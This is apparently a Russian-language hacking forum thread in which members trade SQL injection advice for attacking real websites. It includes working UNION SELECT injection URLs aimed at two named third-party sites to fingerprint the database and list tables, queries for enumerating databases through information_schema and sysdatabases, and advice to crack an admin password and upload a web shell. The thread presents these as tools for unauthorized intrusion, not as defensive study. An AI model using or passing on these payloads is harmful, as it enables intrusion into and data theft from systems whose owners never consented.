Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,548
    Likes Received:
    1,244
    Reputations:
    273
    что бы тебе тянуть брутом базу юзверей..тебе надо добратся до таблички и до колонок сперва... так как я сказал что версия базы 4-я и информатион схемы нет..так что подбери сначала имена табличек и колонок нужные..и только потом думай про дамп базы...вариантов несколько..ты подбираешь пасс админа и через админку заливаешь шелл ..а там уже и доступ прямой к базе..либо используешь какую нибудь тулзу для скулей..например сипт или что быстрее будет, тулзу от Пашкелы...
     
    2 people like this.
  2. Irdis

    Irdis Elder - Старейшина

    Joined:
    6 Feb 2006
    Messages:
    248
    Likes Received:
    52
    Reputations:
    3
    Делаю сканирование на уязвимости, используя OWASP Joomla! Vulnerability Scanner v0.0.3-a.
    Если верить скрипту, то
    Я не понимаю как он понял, что можно провести Blind SQL в параметре id.
     
  3. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,548
    Likes Received:
    1,244
    Reputations:
    273
    а ты его спроси как он понял
     
  4. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Ты думаешь я просто так написал limit 1,1? Твой запрос по логике и должен проходить и выдать нам результат идентичный /index.php?ap=2956775


    Если честно не смотрел твой сайт и вариантов тут может быть просто масса, но догадываюсь в чём проблема. Покажи мне как с помощью параметра передаваемого в гет ты можешь повлиять на контент страницы и я покажу тебе как сделать вывод ;) Это типо пища для ума :)
     
  5. Irdis

    Irdis Elder - Старейшина

    Joined:
    6 Feb 2006
    Messages:
    248
    Likes Received:
    52
    Reputations:
    3
    он слишком болтливый.

    Найти то что мне нужно займёт уйму времени (всего то пару тысяч строк кода на перле).
    Может я не совсем точно выразился, меня не интересует как он нашёл, а если там injection. Я не вижу inj, но скрипт даёт повод для сомнений. Поэтому решил спросить у вас.
     
  6. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,548
    Likes Received:
    1,244
    Reputations:
    273
    не надо верить всем скриптам и программам..а лучше проверить все руками...
     
    1 person likes this.
  7. BlackFan

    BlackFan Member

    Joined:
    3 Jan 2009
    Messages:
    47
    Likes Received:
    40
    Reputations:
    32
    Блиииин)

    Сейчас ковырял сайт, который durito выложил, нашел другую инъекцию, замутил оригинальный запрос, но забыл что там 4.0 и не работают подзапросы :D

    Code:
    http://www.soulmades.com.au/index.php?list=profile&method=modify_form&id=-1+union+select+@a:=mid(version(),1,1),find_in_set(@a,'a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z, ,.,-'),3,4,find_in_set(@a,'1,2,3,4,5,6,7,8,9,0'),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80
    Мб кому-нибудь пригодится)

    Определяем переменную @a:=mid(version(),1,1)
    И в зависимости от ее значения, получаем номер символа в day (если принадлежит [a-z .-]), либо в Children (если принадлежит [0-9])

    Префикс у таблиц скорее всего soul_, потому что есть таблица soul_photo

    PS: наконец-то нашел хоть какое-нибудь применение пользовательских переменных в инъекциях)
     
    #13787 BlackFan, 24 Jun 2010
    Last edited: 25 Jun 2010
    3 people like this.
  8. durito

    durito Elder - Старейшина

    Joined:
    6 Jun 2008
    Messages:
    125
    Likes Received:
    24
    Reputations:
    27
    спасибо всем за советы, буду пробовать
     
    #13788 durito, 24 Jun 2010
    Last edited: 24 Jun 2010
  9. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Очень часто этот скрипт ошибается, особенно когда нет ошибки при наборе неправильно/несуществуюешего урла

    А проверить - да, только ручками, мало ли что скрипты выдают
     
    #13789 Pashkela, 24 Jun 2010
    Last edited: 24 Jun 2010
    1 person likes this.
  10. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    330
    Likes Received:
    129
    Reputations:
    54
    Наверное тупой вопрос, но подскажите как через SQL инъекцию вывести список баз данных на сервере? Ну INFORMATION_SCHEMA это ясно, а вот как узнать другие?
     
  11. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    358
    Likes Received:
    313
    Reputations:
    163

    Code:
    select schema_name from information_schema.schemata
    если так понял
     
    1 person likes this.
  12. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Или так:
    Code:
    select table_schema from information_schema.tables
     
    1 person likes this.
  13. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    330
    Likes Received:
    129
    Reputations:
    54
    Спсибо! То что нужно)
     
  14. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    733
    Likes Received:
    646
    Reputations:
    251
    И что, в бд примерно 40 табл, group_concat() ограничен 512 символами.
    40 табл находится в базе bla1.
    Просто тупо, bla1 40 раз повторится. Не вариант.

    // 2Konqi, даже так.
    // manual говорит что 512.
     
    #13794 Ctacok, 25 Jun 2010
    Last edited: 25 Jun 2010
    3 people like this.
  15. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    первый 16 будут information_schema :D
     
    _________________________
  16. auth_root

    auth_root Member

    Joined:
    31 Jan 2010
    Messages:
    17
    Likes Received:
    9
    Reputations:
    0
    А если так
    select concat_ws(0x3A3a,table_schema,table_name,column_name) from information_schema.columns limit 1,1
    и лимитом перебирать? Будет выводить к какой базе относится таблица и поле, так и узнаем все базы на серваке. Или я не правильно понял вопрос
     
  17. Iggy

    Iggy New Member

    Joined:
    24 Jun 2010
    Messages:
    110
    Likes Received:
    4
    Reputations:
    1
    (MSSQL)
    Code:
    use master
    select * from sysdatabases
    или
    Code:
    select name from master..sysdatabases
    (MySQL)
    Code:
    SELECT CATALOG_NAME AS DataBaseName
    FROM INFORMATION_SCHEMA.SCHEMATA
    или
    Code:
    SELECT name AS DATABASENAME
    FROM master.dbo.sysdatabases
     
    1 person likes this.
  18. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    496
    Likes Received:
    33
    Reputations:
    12
    Хорошая статья про group_concat, почитай.

    Code:
    https://forum.antichat.ru/thread118842.html
     
  19. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886

    прости если я что то не так написал, просто я NooB в этих делах, что я не правильно сказал ? :(
     
    _________________________
  20. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    can'not get tables....
    Code:
    http://www.infoimobiliar.ro/news.php?id=-597+uNioN+seLecT+1,2,unhex%28hex%28group_concat%28table_name%29%29%29,4,5,6,7,8,9+from+information_schema.tables--
     
Loading...
Thread Status:
Not open for further replies.